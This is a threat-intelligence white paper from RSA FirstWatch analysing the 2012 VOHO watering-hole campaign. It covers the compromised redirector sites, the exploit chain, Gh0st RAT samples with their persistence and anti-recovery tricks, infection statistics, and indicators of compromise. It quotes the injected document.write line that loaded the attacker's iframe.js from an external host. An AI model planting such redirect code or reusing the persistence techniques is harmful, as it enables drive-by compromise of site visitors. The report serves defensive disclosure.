 

THE VOHO CAMPAIGN: AN IN DEPTH 
ANALYSIS 
RSA FirstWatchSM Intelligence Report 

  White Paper 

 

 

 

 

About RSA FirstWatchS M Team 

 

RSA FirstWatchSM team is an elite, highly 
trained global threat research and 
intelligence team designed to operate in 
a number of disciplines to provide 
tactical and strategic intelligence on 
advanced threats, threat campaigns and 
threat actors.  The team, lead by Will 
Gragido, focuses on advanced threat 
research and intelligence which 
culminates in threat feeds, digests, 
profiles and ecosystem analysis 
designed to aid the RSA NetWitness® 
user community and the information 
security community at large in 
contending with these challenges. 

Contributing Authors 

Alex Cox, Principal Researcher, RSA 
FirstWatch Team 

Chris Elisan, Principal Malware 
Researcher, RSA FirstWatch Team 

Will Gragido, Sr.Manager, RSA 
FirstWatch Team 

Chris Harrington, Consulting Security 
Engineer, EMC CIRC 

Jon McNeill, Principal Technologist, RSA 
FirstWatch Team 

In July of 2012, the RSA FirstWatchSM research and intelligence team identified an 
emerging malicious code and content campaign spreading at a rapid rate within very 
specific geographic theaters.  These clusters were confined to ten geographic areas 
and involved thousands of hosts.  To the untrained eye it would appear the hosts 
involved in this campaign were compromised as the result of innocent web surfing 
using a common “drive-by” attack mechanism.  While at face value this is true, our 
investigation infers that the populations compromised were not chosen in an 
indiscriminate manner, but rather with great forethought.  Based on the RSA 
FirstWatch research, we believe these websites were likely chosen with exact 
precision and great consideration; selected from thousands upon thousands of 
websites due to familiarity and proximity to the targets of interest that the threat 
actors responsible for the campaign were truly interested in compromising. 

The RSA-FirstWatch team’s research led to the identification of this campaign and its 
name, ‘VOHO’.  From a tools, technique and procedure (TTP) perspective, the RSA 
FirstWatch team believes this campaign aligns with the Advanced Persistent Threat 
(APT) threat model, including communications emitting from compromised hosts to 
IP addresses confirmed as Command and Control (C2) servers (in this case, located 
in Hong Kong); code re-use using exploit scripts and ultimately, a before-unseen 
variant of “Gh0st RAT” malware.  Additionally, targets appeared to be specifically 
chosen to compromise hosts involved in business and local governments in 
Washington, DC and Boston, Massachusetts, as well as organizations involved the 
development and promotion of democratic process in non-permissive regions.  As a 
whole, these specific TTPs have been observed in previous APT attack campaigns, 
most notably, Aurorai and Ghostnetii
. 

 

Through our research, the RSA FirstWatch team identified what it believes to be the 
primary mechanism for tactical and strategic infection of victims affiliated with 
targets of opportunity.  While this attack methodology has been observed before, it 
has not been widely documented or disseminated.  As such, we have termed this 
technique ‘Water Holing’. 

The architects of these campaigns survey and select the websites (known as pivot or 
redirector sites) leveraged in these attacks carefully.  Weighing their geographic 
relevance, proximity to their desired targets of opportunity, and likelihood of being 
traversed by potential victim-users associated with the attacker objective, the 
adversary carefully exploits vulnerable systems and inserts malicious scripts to 
deliver a Trojan payload via browser-based exploits to visitors to the website. 

Throughout this paper, we will examine the evolution of this threat campaign, its ties 
to other comparable threat campaigns where variants of the malicious payload seen 
in this attack (gh0strat) have been identified and chronicled, epicenters of 
geographic activity associated with this campaign, industry/verticals targeted in this 
campaign and the construction of the attribution chain. 

2 

Specifics 

Using the tactic of crafting a “Watering Hole”, the majority of the redirection activity occurred 
because of JavaScript elements on two specific websites.   
 

• 
• 

hxxp://www.xxxxxxxxtrust.com 
hxxp://xxxxxxcountymd.gov  

 
Respectively, these two sites – one a regional bank in Massachusetts and a local government 
serving the Washington DC suburbs. 
 
We also saw an additional chain of websites with a geopolitical central theme redirecting to the 
exploit site: 

• 
• 
• 
• 
• 
• 

hxxp://ifxx.org 
hxxp://xxxxxxcenter.org 
hxxp://xxi.org 
hxxp://xxxxxxx.prio.no 
hxxp:/xxxxxxxxpolitics.com 
hxxp://www.rfxxx.org 

 
Additionally, sites serving the Defense Industrial Base and Educational community were also 
observed redirecting to the exploit site: 

• 
• 

hxxp://www.gftxxx.org 
hxxp://www.xxxxxxantennas.com 

 
When taken as a whole, this campaign appears to have targeted: 
 

Boston, Massachusetts area users  
Political Activists 
Users Washington, DC and its suburbs  

• 
• 
• 
•  Defense Industrial Base 
• 

Education 

Malicious Infrastructure 
Hosts visiting the aforementioned sites were redirected to a website of enthusiasts of a lesser 
known sport at the following domain:   
 
hxxp://xxxxxxxcurling.com 
 

This site attempted to exploit the following host vulnerabilities, in two different attack 
campaigns: 

•  Microsoft XML Core Services – CVE-2012-1889 
• 

Java Exploit – CVE-2012-1723 
 

Once successfully exploited, the installed “Gh0st RAT” would beacon to one of two IP 
addresses: 
 

• 
• 

58.64.155.59 
58.64.155.57 

3 

 

 

Exploit Specifics 

Attack Methodology Overview 

hxxp://xxxxxxxcurling.com Compromise 

Files found on the sporting group website indicate that this server was likely compromised with 
a remote buffer overflow (CVE-2008-3869/CVE-2008-3870) against the server’s sadmind 
daemon.  Additional files indicated the ability to establish a remote shell on demand. 
 
It is unknown if this method was also used to compromise the “watering hole” sites.  In these 
cases, the following code snipped was added to publically accessible pages on the site, 
typically .js files are used to process a site’s JavaScript: 
 
document.write('<script 
src="http://www.*******curling.com/Docs/BW06/iframe.js"></script>'); 
 
This is a simple redirection mechanism that will cause the browser to redirect and load content 
from the remote site.   Hits to “iframe.js” launch an enumeration and exploit chain that 
attempts to exploit two different vulnerabilities,  
 
 
Gh0st RAT is a multiple-purpose remote access tool that allows extensive remote control of 
compromised hosts.   While there is no known evidence linking this attack to previous attacks, 
gh0st has historically been used in politically motivated espionage by nation-state attackers, in 
a similar manner as seen in this campaign depending on the specific redirection path: 
 

•  Microsoft XML Core Services – CVE-2012-1889 
• 

Java Exploit – CVE-2012-1723  

 

. 

Phase 1 - Exploit Chain – Microsoft XML Core Services 
 
From our research, this campaign occurred between June 25th, 2012 and July 18th 2012 in 
which attackers sought to exploit the CVE-2012-1889 vulnerability that was zero-day and was 
being used in targeted attacks as noted in early Juneiii
 
In this attack, a successful exploit on CVE-2012-1889 followed the following path: 
 
[Watering Hole Sites] 
http://xxxxxxcountymd.gov (or other water hole site)  
http://www.xxxxxxxcurling.com/Results/cx/magma/iframe.js  
http://www.xxxxxxxcurling.com/Results/cx/magma/module.php  
http://www.xxxxxxxcurling.com/Results/cx/magma/engine.js  
http://www.xxxxxxxcurling.com/Results/cx/magma/if.htm  
http://www.xxxxxxxcurling.com/Results/cx/magma/enblue.htm  
http://www.xxxxxxxcurling.com/Results/cx/magma/book.cab 

4 

Figure 1: iFrame.js Flow 

 

. 

 
 

 

 

 

 
Iframe.js 
Iframe.js checks if the visiting machine is running a Windows operating system and Internet 
Explorer.  It also sets a cookie value (presumably to track individual visits).  If the visiting 
machine is running a Windows operating system and Internet Explorer, it forward to 
module.php. 

 

Module.php 

Module.php uses a simple redirection script to redirect the browser to Engine.js 

Engine.js 

Engine.js looks for processes related to the following antivirus engines using an older 
vulnerability in Internet Explorer (CVE-2007-4848) that allows local file enumeration: 

Trend Micro  

• 
•  McAfee 
• 

Symantec 

However, the results of this check don’t change the outcome of the script running in all cases; 
it simply results in the loading of “if.htm”.  We believe this to be a case of existing exploit 
script re-use, with slight changes to suit the attackers current purpose. 
 
 
 
 
 
 
 

5 

 

Figure 2: Website Where 
xKungFoo Script Originates 

This particular enumeration script was seen previously in APT-style attacks back in July of 2011, 
as detailed here on the contagiodump blogiv.  Within the blog, noted industry researcher Mila 
Parkour, cited the presence and use of borrowed scripts having likely originated in Asia, 
specifically the so called xKungfoo script in attacks launched associated with numerous 
campaigns targeted at political dissidents.v  Additionally, Ms. Parkour has also noted and 
documented the presence of this weaponizable code in numerous locales on the Internet 
today.vivii
script (the script referenced by Mila Parkour and noted as being germane to the RSA 
FirstWatch investigation) along with endorsement by the author can be seen:   
 

  In the following figures evidence of the presence and availability of the xKungFoo 

Figure 3: Example of xKungFoo 
Script Originates 

Figure 4: Endorsement by 
Author Regarding xKungFoo 

 
 

 

 

 
 
 

 

 

 

6 

 

If.htm 

1) Checks if the visiting host’s user agent reflects is one of the following: 

Unknown 

• 
•  Windows XP 
•  Windows 2003 
•  Windows VistaWindows 7 

 
Checks if the visiting hosts language settings are: 

English 
• 
Chinese 
• 
French 
• 
•  German 
Japanese 
• 
Portuguese 
• 
Korean 
• 
Russian 
• 

 

Enblue.htm 

Enblue.htm uses the CVE-2012-1889 XML vulnerability to compromise the visiting browser, 
which results in a pull and installation of the gh0st RAT malware. 
 
This script also appears to be code reuse of a script seen on pastebin as follows: 
http://pastebin.com/VfmuhEiq 
 
Interestingly, this code was also purportedly used in previous nation-state sponsored attacks 
on Gmail accountsviii

. 

 

Book.cab 

Book.cab, the final payload, is an obfuscated executable which, when de-obfuscated using 
XOR 95, is the gh0st RAT sample named “vptray.exe” (e6b43 
c299a9a1f5abd9be2b729e54577) 

 

Phase II - Exploit Chain – Sun Java 

Phase II of this campaign, using the same infrastructure, but with a different directory for the 
exploit chain files as follows: 
 
[Watering Hole Sites] 
hxxp://xxxxxcountymd.gov (or other water hole site)  
hxxp://www.xxxxxxxcurling.com/Docs/BW06/iframe.js   
hxxp://www.xxxxxxxcurling.com/Docs/BW06/module.php   
hxxp://www.xxxxxxxcurling.com/Docs/BW06/engine.js   
hxxp://www.xxxxxxxcurling.com/Docs/BW06/if.htm  
hxxp://www.xxxxxxxcurling.com/Docs/BW06/applet.jar 
 

7 

 

Figure 5: Java Exploit Chain 

 
 

If.htm 

 

In this case, all of the scripts were identical up to “if.htm”, which instead contained a java call 
that loaded applet.jar, as well as a large blob of obfuscated code as a “param” element.  This 
large blob of code is a binary obfuscated with XOR 77, which the java applet deobfuscates and 
runs as “svohost.exe” (2fe340fe2574ae540bd98bd9af8ec67d). 
 

Figure 6: Java Applet Deobfuscates 
and Runs as “svohost.exe” 

 

 

8 

 

“Watering Hole” Specifics 

Strategically, the idea of using a target’s interests and likely access points is not a new method 
of attack.  Undertaking it on such a large scale, however, is notable and unusual in the APT 
space. 
 
In this campaign, five separate “classes” of sites that were compromised and trojanized to 
redirect to the exploit chains on the sporting group website.  They were: 

• 
• 
• 

• 
• 

Sites with Geographic and Target Relevance to the Boston, MA area  
Sites with Geographic and Target Relevance to Political Activism  
Sites with Geographic and Target Relevance to the Washington, DC  and its suburbs 
areas  
Sites with Geographic and Target Relevance to the Defense Industrial Base 
Sites with Geographic and Target Relevance to the Education 

 

Additionally, there were a spattering of non-related sites that appeared to be simple 
redirectors to one of the above-categorized sites.  This sort of redirector is often used in spam 
campaigns to obfuscate the final location of the exploit server in an attempt to bypass email 
malware controls.  While we don’t have specific examples of related spam activity, this seems 
a likely such use of the additional sites. 

 
One of the main sources of infection for these campaigns were sites that support the cause of 
democratic process in non-permissive environments, or the communication of information 
related to free speech.  That is, entities and people that seek to promote democratic 
government in countries whose existing political structure and power doesn’t support (and 
indeed, persecutes) such governmental change.  This particular strategic vector has been 
observed in prior nation-state sponsored attacks. 
 
Though several sites were targeted by the adversarial element behind this campaign some 
stood out due to their relationships to matters of geopolitical relevance, philanthropy, and 
news media.  Five primary sites were compromised and used as pivot sites from a water holing 
perspective in this campaign.   They were largely North American with the exception of one 
European example.  Additionally, a large percentage of infection activity occurred as a result of 
sites compromised and converted into water holes that offered services to the Washington, DC 
and Boston, MA areas.  As the political and governmental hub of the United States of America, 
wholesale compromise of computers in this area would provide a wealth of intelligence for 
adversaries interested in political process and government action.  Furthermore it should be 
noted that RSA FirstWatch has noted and verified the compromise of nearly one thousand 
unique organizations distinct from those noted within this work.     
 

9 

Figure 7: Industries and Regions 
Leveraged in “Water Holing” Activity 

 
 

 

 
 

Metro 

Washington, 

DC 

• Government 
• Education 

Political 
Activism 

“Watering 
Hole” Pivot 

Sites 

Defense 
Industrial 

Base 

Metro 
Boston 
• Financial 

Svcs 

 

Gh0st RAT 

RAT Overview 
Remote Access Tools\Trojan (RAT) are typically offered as a “legitimate” remote administration 
tool for system administrators, but have largely been used for remote hacking and information 
collection for intelligence purposes or lateral movement activities.  While they are similar in 
function to purpose-built botnets, which also tend to use client/server architecture, RATs 
typically offer a wide range of features rather than the single focus that most modern botnet 
malware adheres to. 
 
Typically, RATs have the ability to: 

• 
• 
• 
• 
• 
• 

Capture keystrokes 
Remote monitoring of webcam and/or microphone 
File system search/browse  
Use of local command prompt 
Execution of arbitrary programs 
File download/upload 

 

Gh0st RAT Specifics 
Gh0st came to prominence following the 2009 publication of “Tracking Ghostnet: Investigating 
a Cyber Espionage Network”, in which this malware was used to infiltrate computers associated 
with the Dalai Lama and was used to compromise information related to Tibetan affairs.   
Gh0st contains all of the above-mentioned capabilities when successfully installed on a target 
PC.   An excellent overview of this tool can be found in the McAfee report titled “Know your 
Digital Enemy”ix
 

. 

10 

 
 

Figure 8: Common Technique 
Empolyed by Gh0st Networks 
Operators 

 
Since the publication of this report, the use of gh0st in hacking incidents has exploded, with 
the RSA FirstWatch team being aware of at least 50 unique gh0st networks.  This can be 
largely explained, much like the proliferation of ZeuS cybercrime malware, to the open 
availability of Gh0st source code on the internet.   When source code for this type of malware 
is available globally it allows “open source” evolution of the malware to add new features and 
capabilities, but more importantly, it permits the constant modification of “indicators” used by 
defenders to detect malware activity in their environment.   From an operational sense, having 
easy opportunity to modify source code allows a much more robust compromise, with 
decreased likelihood of attacker detection. 
 
In many cases this detection is based on: 
1)  Knowledge of known C2 locations 
2)  Detection of a common “gh0st” string that is seen in the network communication of 

“unmodified” gh0st configurations.  

 

 
A common countermeasure used by operators of gh0st networks is to change this gh0st string 
prior to malware compilation to defeat basic IDS signatures. 
 

 

VOHO Sample Analysis 

Fake Symantec Update – Variant 1 
 
VPTray.EXE 
e6b43c299a9a1f5abd9be2b729e54577 
 
This malware comes in a UPX compressed binary, which disguises itself as an update from 
Symantec but instead it installs a backdoor in the target system. 
 
When the malware is first executed, its first order of business is to install itself in the system. 
It does this by dropping an exact copy of itself with the name VPTray.EXE in the current user’s 
“Local Settings\Temp” folder. It then modifies the Windows registry for it to autostart every 
boot up. It does this by using the following registry keys. 
 

•  HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Version\Run 
•  HKEY_USERS\<User’s Security ID>\Software\Microsoft\Windows\Current\Version\Run 

 

11 

 
By using the HKCU and HKU registry hives, the malware is targeting users that are currently 
logged into the machine when the initial infection began instead of the machine itself. This 
technique is especially useful when the target uses roaming profiles. 
 
The malware adds the value “SymantecUpdate” to these keys and pass itself off as an update 
from Symantec. This is a simple technique that is designed to fool the untrained eye. To 
reinforce this, the malware employs a certain level of obfuscation to hide the data, which is the 
location and filename of the malware, by using HEX digits to represent each string characters 
instead of the more common ASCII. 
 
In this case, instead of the data being: 
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\VPTray.exe 
 
It is represented in the registry as: 
43:3a:5c:44:4f:43:55:4d:45:7e:31:5c:41:44:4d:49:4e:49:7e:31:5c:4c:4f:43:41:4c:53:7e:31
:5c:54:65:6d:70:5c:56:50:54:72:61:79:2e:65:78:65:00. 
 
This installation technique of dropping an exact copy of itself tells us that the malware can 
survive and install itself without the aid of a dropper or a downloader. It has the capability to 
check whether it is running in the appropriate location and if it is properly installed on the 
system. If not, it proceeds with the installation process. This technique is advantageous if the 
malware has not been removed properly. A surviving main component can recreate what was 
removed including the necessary registry changes needed by the malware. 
 
Aside from dropping VPTray.EXE it also drops the binary file UP.BAK in the same “Local 
Settings\Temp” folder. This is the backdoor component of the malware. Once all of these are 
accomplished, the original malware passes control to VPTray.EXE and then deletes itself to 
remove any traces of its existence.  
 

Figure 9: Memory dump of the 
malware containing the strings of 
the filenames of the dropped files 
and the registry value. 

 

12 

Figure 10: VPTray.exe connecting 
to IP 134.255.242.47. 

Once the malware is active in the system it utilizes certain protective mechanisms such as the 
following: 

Registry Editor is disabled 

• 
•  Windows System Restore is disabled 

 
Disabling the registry editor prevents the auditing and review of registry entries, especially 
those that are commonly utilized by malware for persistency while the disabling of Windows 
System Restore prevents the user from reverting the system to a known good state before 
infection occurred. The malware also wipes out all the restore points that are present in the 
system before infection.  
 
The main component, VPTray.EXE, is the one that communicates directly to the botnet 
command and control. It connects to IP 134.255.242.47 via HTTPS. It remains active in the 
system listening constantly for instructions while keeping the other components in check. 
 

 
 
The following symptoms can be observed in an infected system: 

 

• 

• 

• 
• 
• 

Presence of VPTray.EXE and UP.BAK in the User’s “Local Settings\Temp” folder. An 
infected Administrator account in Windows XP will have these files in C:\DOCUMENTS 
AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\Temp\ 
Presence of the registry value “SymantecUpdate” with data in HEX values 
representing the file and location of VPTray.EXE in the following registry keys: 

o  HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Version\Run 
o  HKEY_USERS\<User’s Security 

ID>\Software\Microsoft\Windows\Current\Version\Run 

Presence of running process VPTray.EXE 
Unable to use the Registry Editor 
Unable to use Windows System Restore 

Fake Symantec Update – Variant 2 
 
Dropper 
acc583fc596d38626d37cbf6de8a01cb 
 
VPTray.EXE 
b894efe4173f90479fddff455daf6ff3 
 
Unlike the first variant, this one is not compressed. Both the dropper and the dropped file 
(VPTray.EXE) are not compressed. Other difference it has with the first variant is the location 
of the dropped file and the way persistency is achieved. But its modus operandi remains the 
same, and that is to pretend to be a Symantec Live Update.  
 
When the dropper is executed, it drops VPTray.EXE in C:\Program Files\Symantec\LiveUpdate\.  
Having these file in a Symantec folder in Program Files is already a red flag especially if the 
compromised machine does not have a Symantec product installed. 

13 

 
 

 
It then adds the registry key below to achieve persistency. 
 

Key:HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\run 
Value: Symantec LiveUpdate 

• 
• 
•  Data: C:\Program Files\Symantec\LiveUpdate\VPTray.exe 

 
Obviously, the way it achieves persistency is totally different from variant 1. 

• 
• 

• 

Variant 2 used a different registry hive 
Variant 2’s registry value is SymantecLiveUpdate compared to SymantecUpdate in 
variant 1 
The registry data is in ASCII and not in HEX. This is fine because the malware file is 
located in a created Symantec folder in Program Files. 

 

Figure 11: Memory Dump of the 
Malware Containing the Strings of the 
Filenames 

 

 
To ensure its survival, the Windows System Restore is disabled. But unlike the first variant, 
this one did not disable the registry editor due to the fact that the added registry value and 
data appears to be legitimate because it utilizes a location of the file that appears to be a 
normal location for a Symantec file. 
 
To communicate to the attacker the main component, VPTray.EXE, connects to the domain 
usc-data.suroot.com. 
 

14 

The following symptoms can be observed in an infected system: 

• 
• 

• 
• 

Presence of VPTray.EXE in C:\Program Files\Symantec\LiveUpdate\ 
Presence of the registry value “SymantecLiveUpdate” with the data “C:\Program 
Files\Symantec\LiveUpdate\VPTray.EXE” in 
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\run 
Presence of running process VPTray.EXE 
Unable to use Windows System Restore 

 
** As of this writing, the main component, VPTray.EXE, is not detected in VirusTotal using its 
hash search function. 

Fake Microsoft Update 
 
Svohost.EXE 
2fe340fe2574ae540bd98bd9af8ec67d 
 
Similar to the Fake Symantec Update, this malware comes in a UPX compressed binary file.  It 
passes itself off as a Microsoft update but nothing can be further from the truth. 
When the malware is first executed, it installs itself in the system similar to the method 
employed by the Fake Symantec Update. The only difference is the file that is dropped and 
registry value and data it uses. The file is dropped in the current user’s “Local Settings\Temp” 
folder and is named SVOHOST.EXE, which is an exact copy of the malware. This technique of 
naming a file almost similar to a legitimate file (SVCHOST.EXE) is known as homographic 
obfuscation. But in this case, the less elegant method is used, and that is to simply replace one 
letter with another.  To autostart, the malware utilized the same registry keys as the Fake 
Symantec Update. 

•  HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Version\Run 
•  HKEY_USERS\<User’s Security ID>\Software\Microsoft\Windows\Current\Version\Run 

 
By using these registry hives, the malware is able to target users that are currently logged into 
the machine even those that are not currently active in the system (think of Switch User mode). 
 
The malware adds the value “Microsoft Update” to these keys. A common technique, a very 
typical malware deception, to fool users into believing it is something that it is not. Aside from 
this, it also utilizes HEX digits to obfuscate the registry data, which represents the location and 
the filename of the malware.  
 
So instead of the data being C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svohost.exe for an 
infected Administrator account in Windows XP, it appears as 
43:3a:5c:44:4f:43:55:4d:45:7e:31:5c:41:44:4d:49:4e:49:7e:31:5c:4c:4f:43:41:4c:53:7e:31
:5c:54:65:6d:70:5c:73:76:6f:68:6f:73:74:2e:65:78:65:00. 
 
Once all the malware installation procedure is done, the original malware passes control to 
SVOHOST.EXE and deletes itself to hide any traces of its existence. 
 
Once the malware is active in the system it utilizes certain protective mechanisms such as the 
following: 

Registry Editor is disabled 

• 
•  Windows System Restore is disabled 

15 

Figure 12: SVOHOST.EXE 
connecting to 58.64.155.59. 

Disabling the registry editor prevents the auditing and review of registry entries, especially 
those that are commonly utilized by malware for persistency while the disabling of Windows 
System Restore prevents the user from reverting the system to a known good state before 
infection occurred. The malware also wipes out all the restore points that are present in the 
system before infection. To communicate to the attacker, the malware connects to IP 
58.64.155.59. 
 

 
 
The following symptoms can be observed in an infected system. 

 

• 

• 

• 
• 
• 

Presence of SVOHOST.EXE in the User’s “Local Settings\Temp” folder. An infected 
Administrator account in Windows XP will have these files in C:\DOCUMENTS AND 
SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\Temp\ 
Presence of the registry value “Microsoft Update” with data in HEX values representing 
the file and location of SVOHOST.EXE in the following registry keys: 

o  HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Version\Run 
o  HKEY_USERS\<User’s Security 

ID>\Software\Microsoft\Windows\Current\Version\Run 

Presence of running process SVOHOST.EXE 
Unable to use the Registry Editor 
Unable to use Windows System Restore 

VOHO Campaign Analysis 

RSA FirstWatch research examined HTTP logs covering the June/July 2012 timeframe for the 
exploit chain in this example.  This analysis, combined with a detailed understanding of the 
exploit mechanism, allowed the team to get a better understanding of the scope of 
compromise of this campaign. 
 
Based on our analysis, we can determine that this attack was broken up into two phases. 

Phase 1 
We observed referral traffic begin on June 25, 2012 to the exploit site.  However, according to 
the server logs, actual exploitation of Internet Explorer began on July 9, 2012 at approximately 
7:56 AM EST when the first successful exploits of visiting browsers began to hit the exploit 
code.  We observed some movement of exploit code across directories on the 
*******curling.com web server during the investigation, so this gap was likely caused by the 
attacker setting up a new campaign.  Phase 1 exploit activity continued over the course of two 
days, with continuous access, until July 10th, when activity stopped at 3:43 pm EST. 

Phase 2 
Phase 2, which consisted of the above mentioned attack on the Sun Java client, began on July 
16, 2012, when the first successful exploits of visiting java clients began to hit the exploit 
server at approximately 7:46am EST.  This exploit activity continued over the course of a few 
days, and ceased on July 18, 2012, at approximately 9:12 am EST, which was when the server 
administrator of *******curling.com brought the server down for compromise remediation. 

16 

Overall Statistics 
Based on our analysis, a total of 32,160 unique hosts, representing 731 unique global 
organizations, were redirected from compromised web servers injected with the redirect iframe 
to the exploit server.  Of these redirects, 3,934 hosts were seen to download the exploit CAB 
and JAR files (indicating a successful exploit/compromise of the visiting host).  This gives a 
“success” statistic of 12%, which based on our previous understanding of exploit campaigns, 
indicates a very successful campaign. 
 

Total Exposure and Compromise 

35,000 
30,000 
25,000 
20,000 
15,000 
10,000 
5,000 
0 

Total Exposure by Redirect 

Total Compromises 

 
Of the listed sites used to redirect hosts to the exploit site, the top four redirecting web servers 
are as follows: 
 

 

Figure 13: Success of Compromise 

Figure 14: Top Four Redirect Sites 

 
With success rates per exploit type being split pretty much down the middle: 
 
 

 

17 

Figure 15: Exploit Breakdown 

Exploit Breakdown 

CAB Downloads 
JAR Downloads 

 

Exploited Organization Breakdown 
Of the hosts above that downloaded the exploit CAB and JAR files, the RSA FirstWatch team 
further examined compromised organizations by identifying the visiting hosts and cross-
referencing the IP addresses to the Autonomous Systems that they belonged to. 
 
CAVEAT: Because we didn’t have observation of the compromised host themselves, nor 
command and control traffic, our understanding of “compromise” is strictly-related to observed 
HTTP traffic.  This analysis would not take into account host or perimeter-based blocking 
systems at affected organizations. 
 
With this data we then grouped those autonomous systems into the following industries: 

• 

Corporate – These systems were identified as being members of typical corporate 
networks, which included enterprises and business, as well as “business-class” IP 
space in large ISP organizations. 

•  Defense Industrial Base (DIB) – These systems were systems in ASNs that were 

• 

• 

• 

• 

• 

known to be involved with DIB consulting, systems and process. 
Local Government – These systems were systems in networks identified as 
government systems in various cities, counties and towns. 
Internet Service Provider (ISP) - These systems were hosts in networks that were 
identified as common internet service provider space.  This particular classification 
accounts largely for consumer-based internet users, but may also include corporate 
assets that aren’t immediately identifiable by ASN examination. 
Federal Government – These systems are hosts in U.S. Government IP space or 
Washington DC area local government space.  This would include Federal agencies 
and support organizations. 
Educational Institutions (EDU) – These systems were hosts in networks identified 
as educational institutions.  Much like ISP traffic, this traffic is difficult to breakdown 
into more specific identifying information. 
Financial Services Organizations – These systems were systems in identifiable 
Bank, Credit Union, Trading and other organizations related to financial services. 

•  Healthcare - These systems were hosts in identifiable healthcare industry space.   

This would include hospital, pharmaceutical, patient services and clinic space. 

•  Other Government – These systems were national government systems identified in 

foreign IP space or global government organizations (example: United Nations) 

•  Utilities / SCADA - These systems were hosts identified in organizations that supply 

or support utility or SCADA-related services such as Energy and water services. 

 

18 

 
 

Figure 16: Compromises by Industry 

Compromises by Industry 

UTILITIES / SCADA 
OTHER GOVT 
LOCAL GOVT 
ISP 
HEALTHCARE 
FINANCIAL 
FED GOVT 
EDU  
DIB  
CORPORATE 

0 

500 

1,000  1,500  2,000  2,500 

 
By removing ISP traffic, we are better able to examine the other industries: 
 

Compromise By Industry (without ISP) 

Figure 17: Compromise by Industry 
without ISP 

UTILITIES / SCADA 
OTHER GOVT 
LOCAL GOVT 
HEALTHCARE 
FINANCIAL 
FED GOVT 
EDU  
DIB  
CORPORATE 

0 

200 

400 

600 

800 

 

Linked Campaigns 

 

 

Wsdhealthy.comxxixii
 
Based on our understanding of this campaign and TTPs (tools, techniques and procedures) 
used, we believe the following malware samples observed in January 2012 are related and 
belong to the same threat actors. 
 

 
03db29c71b0031af08081f5e2f7dcdf2  
644161889f0f60885b2a0eec12038b66 
 
 

 

19 

These samples communicated with C2 at 58.64.143.245.  This IP address has resolved to the 
following DNS names in the past: 
 
usc-data.suroot.com 
usa-mail.scieron.com 
dll.freshdns.org 
 
Delivery of these samples appeared to be a similar attack vector, that being a hacked server 
that was redirected to by iframe insertion: 
 
www.wsdhealthy.com 
 
Using the following URLs: 
 
www.wsdhealthy.com/userfiles/file/Applet19.html 
www.wsdhealthy.com/userfiles/file/Applet19.exe 
www.wsdhealthy.com/userfiles/file/Applet.html 
www.wsdhealthy.com/userfiles/file/Applet.jar 
www.wsdhealthy.com/userfiles/file/Applet.exe 
 
This file structure indicates a similar java exploitation, and while we didn’t have direct 
observation of this campaign, open source intelligence indicates a possible exploit of: 
 
CVE–2011-3544 - Unspecified vulnerability in the Java Runtime Environment 
 
Additionally, the Gh0st RAT variant used in this campaign matched identifiers used in the 
VOHO campaign.  

Detection and Indicators of Compromise 

Network 

For network detection of this threat, users should look for historic traffic to the following IPs 
and Domains: 

IP Addresses 

58.64.155.59 (gh0st RAT C2) 
58.64.155.57 (gh0st RAT C2) 
58.64.143.245 (gh0st RAT C2) 

Domains 

wsdhealthy.com (legitimate site hosting exploit code/malware) 
*******curling.com (legitimate site hosting exploit code/malware) 
usc-data.suroot.com (gh0st RAT C2) 
usa-mail.scieron.com (gh0st RAT C2) 
dll.freshdns.org (gh0st RAT C2) 

20 

Gh0st RAT 

Generically, gh0st RAT communication using the unmodified source code can be detected by 
looking for non-RFC compliant network traffic on allowed paths, which contain the string 
“Gh0st” in the first view five bytes of the packet payload.  Because this is a commonly used 
tactic to detect Gh0st on the network, attackers often change this string to avoid detection.  In 
the case of the VOHO compromise, this indicator is “HTTPS”. 

Known Malicious MD5 Hashes 

03db29c71b0031af08081f5e2f7dcdf2  
644161889f0f60885b2a0eec12038b66 
e6b43c299a9a1f5abd9be2b729e54577 
2fe340fe2574ae540bd98bd9af8ec67d 

RSA NetWitness Indicators 

ip.dst = 58.64.155.59,58.64.155.57,58.64.143.245,64.26.174.74 || alias.host = 
www.wsdhealthy.com ,usc-data.suroot.com,usa-mail.scieron.com,dll.freshdns.org 
 
Additionally, the following feeds and parsers from RSA NetWitness Live service can be used for 
additional Gh0st RAT detection. 
 
Gh0st parser 
APT-domains feed 
APT-IPs feed 
 

Conclusions 

RSA FirstWatch research has revealed an exploit and compromise campaign with connections 
over the past 8 months.  The collected data suggests that this attack was orchestrated and 
carried out by threat actors commonly referred to in the industry as “APT”: 
 

1)  Use of the “xKungFoo” script kit for victim redirection 
2)  Use of attack methodology that matches motives seen in past APT attacks – most 

notably such as those seen in the Aurora and GhostNet campaigns  

3)  Use of the “gh0st” remote access tool (RAT) in this and previous campaigns 
4)  Use of command and control infrastructure in the Hong Kong area in this and previous 

5) 
6) 

International finance & banking 

campaigns 
 Gross impact and on almost 900 unique organizations  
 Targets of Interest and Opportunity being geographically disperse in addition to 
industrial & vertical diverse with a heavy concentration in the following areas: 
• 
•  Technology 
•  Government – municipal, state, federal and international  
•  Utilities & energy 
•  Educational  
•  Defense Industrial Base (DIB) 
•  Corporate Enterprise 

 
The possibility exists that this was intentional misdirection on the part of the attackers in 
regards to their origin. However, the RSA FirstWatch team believes the data supports our 
analysis and this is further evidence of APT intrusion into United States government and 
corporate assets. 

21 

 

Disclaimer 

RSA Security LLC (“RSA”) believes the information in this publication is accurate as of 
its publication date. RSA disclaims any obligation to update after the date hereof. The 
information is subject to update without notice.  The analysis may include technical or 
other inaccuracies and/or typographical errors.   

THE INFORMATION IN THIS PUBLICATION IS PROVIDED TO FOR INFORMATIONAL 
PURPOSES ONLY, IS PROVIDED "AS IS," AND SHALL NOT BE CONSIDERED PRODUCT 
DOCUMENTATION OR SPECIFICATIONS UNDER THE TERMS OF ANY LICENSE OR 
SIMILAR AGREEMENT. RSA MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY 
KIND WITH RESPECT TO THE INFORMATION IN THIS PUBLICATION, AND SPECIFICALLY 
